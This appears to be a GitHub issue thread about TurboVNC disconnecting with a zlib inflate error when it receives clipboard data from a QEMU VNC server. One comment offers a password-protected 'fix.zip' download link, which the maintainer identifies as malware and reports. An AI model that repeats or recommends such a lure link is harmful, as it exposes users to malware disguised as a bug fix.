### ISSUE TITLE
Error when accepting clipboard data from QEMU VNC Server

### ISSUE THREAD

**Issue by yanjiew1** [TurboVNC/turbovnc#428]
I used TurboVNC to connect to a VM running in QEMU with KVM. 

However, whenever I attempted to copy text within the VM, I encountered the error message: "ZlibInStream: inflate failed," followed by a disconnection of the VNC connection.

Host OS: Fedora 40  
QEMU version: 8.2.7

Steps to reproduce:
1. Create a VM using virt-manager, set the display server to VNC, and configure the qemu-vdagent channel for clipboard sharing.
2. Install Windows 10 in the VM.
3. Install spice-vdagent within the VM.
4. Attempt to copy text within the VM, and the VNC connection will disconnect.

**Comment by DaavMendonca** [comment]
maybe this will help

https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file
Pass: xfp53

you may need to install the c compiler

**Comment by dcommander** [comment]
It's possible that zlib-compressed clipboard transfers have never been tested, since I don't think our own server uses them. I will look into it.

**Comment by dcommander** [comment]
@DaavMendonca Your malware comment has been deleted and reported.
